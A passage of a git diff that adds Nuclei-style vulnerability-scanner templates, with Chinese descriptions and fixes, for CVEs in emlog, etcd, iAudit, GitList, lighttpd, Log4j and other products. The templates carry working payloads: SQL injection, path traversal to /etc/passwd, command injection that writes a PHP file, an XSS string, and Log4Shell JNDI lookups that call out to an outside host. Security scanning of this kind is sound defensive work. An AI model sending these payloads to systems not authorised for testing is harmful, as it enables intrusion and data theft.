8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - (body_1 == body_2) && (body_2 != body_3) + path: + - '{{BaseURL}}/E-mobile/flow/flowhave_page.php?detailid=2,3' + - '{{BaseURL}}/E-mobile/flow/flowhave_page.php?detailid=2,3+RLIKE+(SELECT+(CASE+WHEN+(1351=1351)+THEN+0x322c33+ELSE+0x28+END))' + - '{{BaseURL}}/E-mobile/flow/flowhave_page.php?detailid=2,3+RLIKE+(SELECT+(CASE+WHEN+(1351=1352)+THEN+0x322c33+ELSE+0x28+END))' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/emlog/CVE-2021-3293.yaml b/config/51pwn/yaml/emlog/CVE-2021-3293.yaml new file mode 100755 index 000000000..e3497ff2d --- /dev/null +++ b/config/51pwn/yaml/emlog/CVE-2021-3293.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-3293 +info: + name: emlog 5.3.1 Path Disclosure + author: + - l0ne1y + description: |- + Emlog 路径泄露漏洞 + Emlog是Emlog个人开发者的一套基于PHP和MySQL的CMS建站系统。 + + emlog v5.3.1 版本存在路径遍历漏洞,该漏洞源于允许攻击者查看webroot/文件的路径。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/emlog/emlog/ + + 临时修复方案: + 1、屏蔽错误信息 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - Warning + - on line + - expects parameter + matchers-condition: and + raw: + - | + GET /t/index.php?action[]=aaaa HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/etcd/http-etcd-unauthenticated-api-data-leak.yaml b/config/51pwn/yaml/etcd/http-etcd-unauthenticated-api-data-leak.yaml new file mode 100755 index 000000000..469017abe --- /dev/null +++ b/config/51pwn/yaml/etcd/http-etcd-unauthenticated-api-data-leak.yaml @@ -0,0 +1,38 @@ +id: http-etcd-unauthenticated-api-data-leak +info: + name: etcd Unauthenticated HTTP API Leak + author: + - l0ne1y + description: |- + etcd 未经身份验证的 HTTP API 泄​​漏 + etcd HTTP API 无需身份验证即可访问。这可能会导致密钥被泄露,其中可能包含敏感信息。它还允许用户在没有身份验证的情况下更改和删除密钥。因此,远程攻击者不仅可以识别用户名和密码等敏感信息,还可以更改或删除这些数据。 + severity: high + remediation: |- + 官方修复方案: + 升级到官方最新版本: + https://etcd.io/ + + 临时修复方案: + 1.不要将 Etcd 服务对外开放; + 2.配置合适的安全认证方案。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"roles"' + - '"permissions"' + - '"role"' + - '"kv"' + - type: status + status: + - 200 + - type: word + part: header + words: + - text/plain + matchers-condition: and + path: + - '{{BaseURL}}/v2/auth/roles' + method: GET diff --git a/config/51pwn/yaml/exacqVision/CVE-2020-9047.yaml b/config/51pwn/yaml/exacqVision/CVE-2020-9047.yaml new file mode 100755 index 000000000..12f0c188c --- /dev/null +++ b/config/51pwn/yaml/exacqVision/CVE-2020-9047.yaml @@ -0,0 +1,78 @@ +id: CVE-2020-9047 +info: + name: exacqVision Web Service RCE + author: + - dwisiswant0 + tags: + - cve + - cve2020 + - rce + - exacqvision + - service + description: |- + Johnson Controls exacqVision Enterprise Manager和Web Service 数据伪造问题漏洞 + + Johnson Controls exacqVision Enterprise Manager和exacqVision Web Service都是美国江森自控(Johnson Controls)公司的产品。exacqVision Enterprise Manager是一套企业视频管理软件。exacqVision Web Service是一款支持使用Web浏览器查看实时视频,搜索和播放视频的程序。 + + Johnson Controls exacqVision Web Service 20.06.3.0及之前版本和Enterprise Manager 20.06.4.0及之前版本中存在数据伪造问题漏洞,该漏洞源于软件没有正确验证数据的加密签名。攻击者可利用该漏洞下载和运行恶意可执行文件。 + reference: + - /~https://github.com/norrismw/cve-2020-9047 + - https://www.johnsoncontrols.com/cyber-solutions/security-advisories + - https://www.us-cert.gov/ics/advisories/icsa-20-170-01 + severity: high + classification: + cve-id: + - cve-2020-9047 + cwe-id: + - cwe-347 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.johnsoncontrols.com/cyber-solutions/security-advisories + + 临时修复方案: + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 + ``` +requests: +- matchers: + - type: word + condition: or + part: body + words: + - 3.10.4.72058 + - 3.12.4.76544 + - 3.8.2.67295 + - 7.0.2.81005 + - 7.2.7.86974 + - 7.4.3.89785 + - 7.6.4.94391 + - 7.8.2.97826 + - 8.0.6.105408 + - 8.2.2.107285 + - 8.4.3.111614 + - 8.6.3.116175 + - 8.8.1.118913 + - 9.0.3.124620 + - 9.2.0.127940 + - 9.4.3.137684 + - 9.6.7.145949 + - 9.8.4.149166 + - 19.03.3.152166 + - 19.06.4.157118 + - 19.09.4.0 + - 19.12.2.0 + - 20.03.2.0 + - 20.06.3.0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/version.web' + method: GET diff --git a/config/51pwn/yaml/feifeicms/feifeicms-lfr.yaml b/config/51pwn/yaml/feifeicms/feifeicms-lfr.yaml new file mode 100755 index 000000000..2cd28644d --- /dev/null +++ b/config/51pwn/yaml/feifeicms/feifeicms-lfr.yaml @@ -0,0 +1,45 @@ +id: feifeicms-lfr +info: + name: FeiFeiCms Local File Read + author: + - l0ne1y + tags: + - feifeicms + - lfi + description: |- + 飞飞CMS存在后台任意文件读取漏洞 + FeiFeiCms是一款PHP电影程序。 + + FeiFeiCms v4.1.190209存在任意文件读取漏洞,漏洞源于未能对输入的../进行过滤,攻击者可利用该漏洞读取任意文件。 + reference: + - https://www.cnblogs.com/jinqi520/p/10202615.html + - https://gitee.com/daicuo/feifeicms + severity: high + remediation: |- + **官方修复方案** + 请在官方链接下载最新版本 + https://www.feifeicms.org/ + + **临时修复方案** + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - frps dashboard + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/static/' + method: GET diff --git "a/config/51pwn/yaml/iAudit\350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/Qilin-Bastion-HostRce.yaml" "b/config/51pwn/yaml/iAudit\350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/Qilin-Bastion-HostRce.yaml" new file mode 100755 index 000000000..208bb8c2c --- /dev/null +++ "b/config/51pwn/yaml/iAudit\350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/Qilin-Bastion-HostRce.yaml" @@ -0,0 +1,34 @@ +id: Qilin-Bastion-HostRce +info: + name: iAudit-fortressaircraft-rce + author: + - l0ne1y + description: |- + 中远麒麟iAudit运维审计系统未授权远程命令执行漏洞 + 中远麒麟iAudit运维审计系统,是北京中远麒麟科技有限公司开发的软硬件一体化统一安全运维平台(堡垒机),该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控。 + + 中远麒麟iAudit运维审计系统存在未授权远程命令执行漏洞,近期已发现针对该漏洞的在野利用。get_luser_by_sshport.php接口获取路径变量时,存在未经过滤的字符串拼接,攻击者可利用该漏洞注入命令,获取堡垒机系统权限。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.tosec.com.cn/ + + 临时修复方案: + 1. 禁止将中远麒麟iAudit运维审计系统映射到公网 + 2. 在安管设备对get_luser_by_sshport.php接口做访问限制 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body_2,verify) + matchers-condition: and + path: + - '{{BaseURL}}/get_luser_by_sshport.php?clientip=1;echo%20"">/opt/freesvr/web/htdocs/freesvr/audit/{{filename}}.php;&clientport=1' + - '{{BaseURL}}/{{filename}}.php' + method: GET + req-condition: true +variables: + filename: '{{rand_text_alpha(6, "abc")}}' + verify: '{{rand_text_alphanumeric(8,"")}}' diff --git a/config/51pwn/yaml/iPECS NMS 30M/CVE-2018-15138.yaml b/config/51pwn/yaml/iPECS NMS 30M/CVE-2018-15138.yaml new file mode 100755 index 000000000..524428cd7 --- /dev/null +++ b/config/51pwn/yaml/iPECS NMS 30M/CVE-2018-15138.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-15138 +info: + name: LG-Ericsson iPECS NMS 30M Directory Traversal + author: + - l0ne1y + description: |- + Ericsson-LG iPECS NMS 30M 任意文件读取漏洞 + Ericsson-LG iPECS NMS 30M是韩国Ericsson-LG公司的一套网络管理解决方案。 + + Ericsson-LG iPECS NMS 30M中存在文件读取漏洞。攻击者可借助ipecs-cm/download?filename=../URIs利用该漏洞获取敏感信息(配置文件)。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.ipecs.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data' + - '{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/ifw8/CVE-2019-16313.yaml b/config/51pwn/yaml/ifw8/CVE-2019-16313.yaml new file mode 100755 index 000000000..11222064b --- /dev/null +++ b/config/51pwn/yaml/ifw8/CVE-2019-16313.yaml @@ -0,0 +1,45 @@ +id: CVE-2019-16313 +info: + name: ifw8 Router ROM v4.31 Credential Discovery + author: + - l0ne1y + description: |- + ifw8路由器ROM v4.31允许凭据泄漏 + 智蜂网科技 ifw8 Router ROM是中国智蜂网科技公司的一套路由器操作系统。 + + 智蜂网科技 ifw8 Router ROM v4.31版本中存在信息泄露漏洞。攻击者可通过读取action/usermanager.htm HTML源码利用该漏洞泄露凭证。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.ifw8.cn/ + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: regex + part: body + regex: + - \*\*\*\*\*\*<\/td> + - type: status + status: + - 200 + extractors: + - type: regex + regex: + - \*\*\*\*\*\*<\/td> + group: 1 + part: body + matchers-condition: and + path: + - '{{BaseURL}}/action/usermanager.htm' + method: GET diff --git a/config/51pwn/yaml/jeewms/jeewms-lfi.yaml b/config/51pwn/yaml/jeewms/jeewms-lfi.yaml new file mode 100755 index 000000000..5bb835263 --- /dev/null +++ b/config/51pwn/yaml/jeewms/jeewms-lfi.yaml @@ -0,0 +1,42 @@ +id: jeewms-lfi +info: + name: JEEWMS LFI + author: + - l0ne1y + description: |- + JEEWMS 文件读取 + jeewms是一个基于JAVA的仓库管理系统,是由灵鹿谷科技主导的开源项目,WMS在经过多家公司上线运行后,为了降低物流仓储企业的信息化成本,决定全面开源此产品。针对有特殊信息化需求的企业,提供高性价比的实施服务。 + jeewms showOrDownByurl.do页面存在任意文件读取漏洞,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://gitee.com/erzhongxmu/jeewms?utm_source=alading&utm_campaign=repo + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + condition: or + part: body + regex: + - 'root:.*:0:0:' + - \[(font|extension|file)s\] + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + - | + GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/jitsi/CVE-2021-26812.yaml b/config/51pwn/yaml/jitsi/CVE-2021-26812.yaml new file mode 100755 index 000000000..bc9433707 --- /dev/null +++ b/config/51pwn/yaml/jitsi/CVE-2021-26812.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-26812 +info: + name: Moodle jitsi plugin XSS + author: + - aceseven (digisec360) + tags: + - cve + - cve2021 + - moodle + - jitsi + - xss + - plugin + description: |- + Jitsi 跨站脚本漏洞 + 8X8 Docker Jitsi Meet是美国8x8(8X8)公司的一款用于在Docker构建Jitsi Meet视频会议解决方案的工具。 + + Jitsi Meet 2.7版本至2.8.3版本存在跨站脚本漏洞,该漏洞源于sessionprivi .php模块 + reference: + - /~https://github.com/udima-university/moodle-mod_jitsi/issues/67 + - https://nvd.nist.gov/vuln/detail/cve-2021-26812 + severity: medium + classification: + cve-id: + - cve-2021-26812 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/udima-university/moodle-mod_jitsi/issues/67 + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' + ``` +requests: +- matchers: + - type: word + part: body + words: + - alert(document.domain); + - type: status + status: + - 200 + - type: word + part: header + words: + - MoodleSession + matchers-condition: and + path: + - '{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1' + method: GET diff --git a/config/51pwn/yaml/jnoj/CVE-2019-17538.yaml b/config/51pwn/yaml/jnoj/CVE-2019-17538.yaml new file mode 100755 index 000000000..ad1c0479d --- /dev/null +++ b/config/51pwn/yaml/jnoj/CVE-2019-17538.yaml @@ -0,0 +1,50 @@ +id: CVE-2019-17538 +info: + name: Jnoj arbitrary local file inclusion (LFI) + author: + - pussycat0x + tags: + - cve + - cve2019 + - jnoj + - lfi + description: |- + Jiangnan Online Judge 路径遍历漏洞 + Jiangnan Online Judge是一套用于计算机编程的在线评测系统。该系统主要用于对用户提交的源代码进行编译和执行,并检验程序源代码的正确性。 + + Jiangnan Online Judge 0.8.0版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 + reference: + - /~https://github.com/shi-yang/jnoj/issues/53 + severity: high + classification: + cve-id: + - cve-2019-17538 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.jnoj.org + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - 'root:.*:0:0:' + matchers-condition: and + raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/klaussilveira GitList /CVE-2018-1000533.yaml b/config/51pwn/yaml/klaussilveira GitList /CVE-2018-1000533.yaml new file mode 100755 index 000000000..4438ada2c --- /dev/null +++ b/config/51pwn/yaml/klaussilveira GitList /CVE-2018-1000533.yaml @@ -0,0 +1,59 @@ +id: CVE-2018-1000533 +info: + name: GitList < 0.6.0 Remote Code Execution + author: + - pikpikcu + tags: + - rce + - git + - cve + - cve2018 + - gitlist + description: |- + GitList远程代码执行漏洞 + klaussilveira GitList 是一个使用 PHP 语言编写的具有图形化界面的Git存储库查看器,它支持与多个Git存储库进行交互、支持使用浏览器查看存储库。 + klaussilveira GitList 0.6 及之前版本中的‘searchTree’函数存在安全漏洞,该漏洞源于程序将未正确的过滤的输入传入到‘system’函数。攻击者可利用该漏洞以PHP用户身份执行任意代码。 + reference: + - /~https://github.com/vulhub/vulhub/tree/master/gitlist/cve-2018-1000533 + - https://nvd.nist.gov/vuln/detail/cve-2018-1000533 + - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html + - /~https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322 + severity: critical + classification: + cve-id: + - cve-2018-1000533 + cwe-id: + - cwe-20 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322 + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: body + words: + - root:/root:/bin/bash + extractors: + - name: path + type: regex + regex: + - (.*?) + group: 1 + part: body + internal: true + raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + - | + POST /{{path}}/tree/a/search HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + query=--open-files-in-pager=cat%20/etc/passwd diff --git a/config/51pwn/yaml/kylin/CVE-2020-13937.yaml b/config/51pwn/yaml/kylin/CVE-2020-13937.yaml new file mode 100755 index 000000000..d7ad7e784 --- /dev/null +++ b/config/51pwn/yaml/kylin/CVE-2020-13937.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-13937 +info: + name: Apache Kylin Exposed Configuration File + author: + - pikpikcu + description: "Apache Kylin API 未授权访问漏洞\t\t\nApache Kylin™是一个开源的、分布式的分析型数据仓库。近日Apache + Kylin官方修复 CVE-2020-13937 API未授权访问漏洞。攻击者可构造恶意请求,访问API地址,可以获取Apache Kylin的相关配置信息,从而导致身份凭证等信息泄漏。阿里云应急响应中心提醒 + Apache Kylin 用户尽快采取安全措施阻止漏洞攻击。" + severity: medium + remediation: |- + **官方修复方案:** + 官方已经修复该漏洞,请在链接地址下载最新版本https://kylin.apache.org/download/ + + **临时修复方案:** + 1、API禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。 + 2、API所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 3、限制IP访问,绑定固定的IP访问后台管理系统。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/json + - type: word + condition: and + part: body + words: + - config + - kylin.metadata.url + matchers-condition: and + path: + - '{{BaseURL}}/kylin/api/admin/config' + method: GET + headers: + Content-Type: application/json diff --git a/config/51pwn/yaml/lighttpd/CVE-2014-2323.yaml b/config/51pwn/yaml/lighttpd/CVE-2014-2323.yaml new file mode 100755 index 000000000..73fa62151 --- /dev/null +++ b/config/51pwn/yaml/lighttpd/CVE-2014-2323.yaml @@ -0,0 +1,26 @@ +id: CVE-2014-2323 +info: + name: Lighttpd 1.4.34 SQL Injection and Path Traversal + author: + - l0ne1y + description: |- + lighttpd SQL注入漏洞 + lighttpd是德国软件开发者Jan Kneschke所研发的一款开源的Web服务器,它的主要特点是仅需少量的内存及CPU资源即可达到同类网页服务器的性能。 + + lighttpd 1.4.34及之前版本中的mod_mysql_vhost.c文件存在SQL注入漏洞。远程攻击者可借助特制的主机名利用该漏洞执行任意SQL命令 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + http://www.lighttpd.net/2014/3/12/1.4.35/ + 临时修复方案:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: regex + regex: + - 'root:[x*]:0:0:' + raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: [::1]' UNION SELECT '/ + + unsafe: true diff --git a/config/51pwn/yaml/log4j/CVE-2021-44228.yaml b/config/51pwn/yaml/log4j/CVE-2021-44228.yaml new file mode 100755 index 000000000..6963c3352 --- /dev/null +++ b/config/51pwn/yaml/log4j/CVE-2021-44228.yaml @@ -0,0 +1,77 @@ +id: CVE-2021-44228 +info: + name: Apache Log4j2 Remote Code Injection + author: + - l0ne1y + description: |- + Apache Log4j2 远程代码执行漏洞 + Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 + + Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://logging.apache.org/log4j/2.x/security.html + + **临时修复方案** + 1.建议JDK使用6u211、7u201、8u191、11.0.1及以上的版本; + 2.添加jvm启动参数:-Dlog4j2.formatMsgNoLookups=true; + 3.添加log4j2.component.properties配置文件,增加如下内容为: + log4j2.formatMsgNoLookups=true; + 4.系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true; + 5.禁止安装log4j的服务器访问外网,并在边界对dnslog相关域名访问进行检测。 + 6.凡检测到包含“${jndi:ldap:”的关键字,直接阻断访问流量 + 7.使用如下官方临时补丁进行修复/~https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1 + 8.在攻击过程中可能使用 DNSLog 进行漏洞探测,建议可以通过流量监测设备监控是否有相关 DNSLog 域名的请求。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - dns + - type: regex + part: interactsh_request + regex: + - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+ + extractors: + - type: kval + kval: + - interactsh_ip + - type: regex + regex: + - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+ + group: 2 + part: interactsh_request + - type: regex + regex: + - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+ + group: 1 + part: interactsh_request + matchers-condition: and + raw: + - | + GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 + Host: {{Hostname}} + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}} + Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}} + Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}} + Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}} + Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}} + Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}} + Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}} + Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}} + Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}} + Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}} + Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}} + Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}} + User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}} + X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}} + X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}} + X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}} + X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}} + X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}} + stop-at-first-match: true diff --git a/config/51pwn/yaml/log4j/CVE-2021-45046.yaml b/config/51pwn/yaml/log4j/CVE-2021-45046.yaml new file mode 100755 index 000000000..8017c7463 --- /dev/null +++ b/config/51pwn/yaml/log4j/CVE-2021-45046.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-45046 +info: + name: Apache Log4j2 Remote Code Injection + author: + - l0ne1y + description: |- + Apache Log4j2 Lookup 代码执行与拒绝服务漏洞 + 发现Apache Log4j 2.15.0中针对CVE-2021-44228的修复在某些非默认配置中不完整。当日志配置使用带有上下文查找的非默认模式布局(例如,$${ctx:loginId})时,控制线程上下文映射 (MDC) 输入数据的攻击者可以使用 JNDI 查找模式制作恶意输入数据,导致部分环境信息泄露和远程代码执行。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://logging.apache.org/log4j/2.x/security.html。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - dns + - type: regex + part: interactsh_request + regex: + - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+ + extractors: + - type: regex + regex: + - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+ + group: 2 + part: interactsh_request + - type: regex + regex: + - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+ + group: 1 + part: interactsh_request + matchers-condition: and + raw: + - | + GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1 + Host: {{Hostname}} + Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}} + Accept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}} + Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}} + Access-Control-Request-Headers: 